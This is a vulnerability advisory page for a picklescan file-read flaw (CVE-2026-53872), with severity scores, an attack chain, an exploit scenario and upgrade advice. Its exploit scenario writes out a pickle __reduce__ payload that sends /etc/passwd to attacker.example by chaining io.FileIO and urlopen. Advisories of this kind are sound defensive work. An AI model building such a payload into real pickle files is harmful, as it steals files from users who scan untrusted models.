Skip to main content

picklescan CVE-2026-53872

HIGH
Path Traversal (CWE-22)
2026-06-17 VulnCheck
Path Traversal Deserialization Information Disclosure Picklescan
8.7
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.5 MEDIUM

Remote attacker delivers a pickle but a user/automation must invoke the scanner on it (UI:R); no auth needed; only confidentiality impact via arbitrary file read.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 17, 2026 - 16:49 vuln.today
Analysis Generated
Jun 17, 2026 - 16:49 vuln.today

DescriptionCVE.org

picklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to external servers.

AnalysisAI

Arbitrary file read in picklescan versions before 0.0.35 allows remote unauthenticated attackers to exfiltrate sensitive server files by abusing standard-library callables that the tool's RCE-focused blocklist fails to detect. By chaining io.FileIO and urllib.request.urlopen inside a malicious pickle, an attacker can stream contents of files such as /etc/passwd to an attacker-controlled URL when the scanner processes untrusted model artifacts. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Craft malicious pickle with io.FileIO + urlopen reduce chain
Delivery
Publish pickle to model hub or supply to victim pipeline
Exploit
Victim runs picklescan < 0.0.35 on file
Install
Blocklist misses non-RCE primitives
C2
Unpickling opens /etc/passwd via io.FileIO
Execute
urllib.request.urlopen POSTs file contents to attacker URL
Impact
Sensitive data exfiltrated
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires that a victim system run picklescan < 0.0.35 against an attacker-controlled pickle file and that the host have outbound network connectivity to the attacker's URL for the urllib.request.urlopen leg of the chain; no authentication, user interaction beyond invoking the scanner, or non-default configuration is needed. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector AV:N/AC:L/AT:N/PR:N/UI:N gives an 8.7 score driven entirely by VC:H, with VI and VA at N - accurate, because the bug yields confidentiality loss (file read and SSRF) but not direct integrity or availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker uploads a malicious .pkl file (for example, as part of a model repository on a public ML hub) whose __reduce__ method returns urllib.request.urlopen('https://attacker.example/collect', io.FileIO('/etc/passwd','r')). When a downstream user or automated pipeline runs picklescan against the file expecting a safe/unsafe verdict, the scanner's deserialization path executes the chain and streams the target file to the attacker's webhook. …
Remediation Vendor-released patch: picklescan 0.0.35 - upgrade via pip install --upgrade 'picklescan>=0.0.35' and rebuild any container images, CI workers, or Hugging Face integration services that bundle the library. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Identify and inventory all systems running picklescan versions before 0.0.35; restrict picklescan processing to internally-sourced, trusted model artifacts only. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-3490 CRITICAL
10.0 Jun 17

Remote code execution against users of picklescan versions prior to 1.0.4 is achievable by smuggling any blocked functio
CVE-2025-71320 CRITICAL
9.3 Jun 17

Arbitrary code execution in picklescan before 0.0.33 allows remote attackers to bypass the scanner's malicious-pickle de
CVE-2025-71321 CRITICAL
9.3 Jun 17

Arbitrary file write in picklescan before 0.0.33 lets attackers bypass the tool's dangerous-call blocklist by abusing di
CVE-2025-71323 CRITICAL
9.3 Jun 17

Remote code execution in picklescan before 0.0.33 enables attackers to bypass the tool's malicious-pickle detection by s
CVE-2025-71325 CRITICAL
9.3 Jun 17

Detection bypass in picklescan versions prior to 0.0.27 allows attackers to smuggle malicious Python pickle files past t

Share

CVE-2026-53872 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy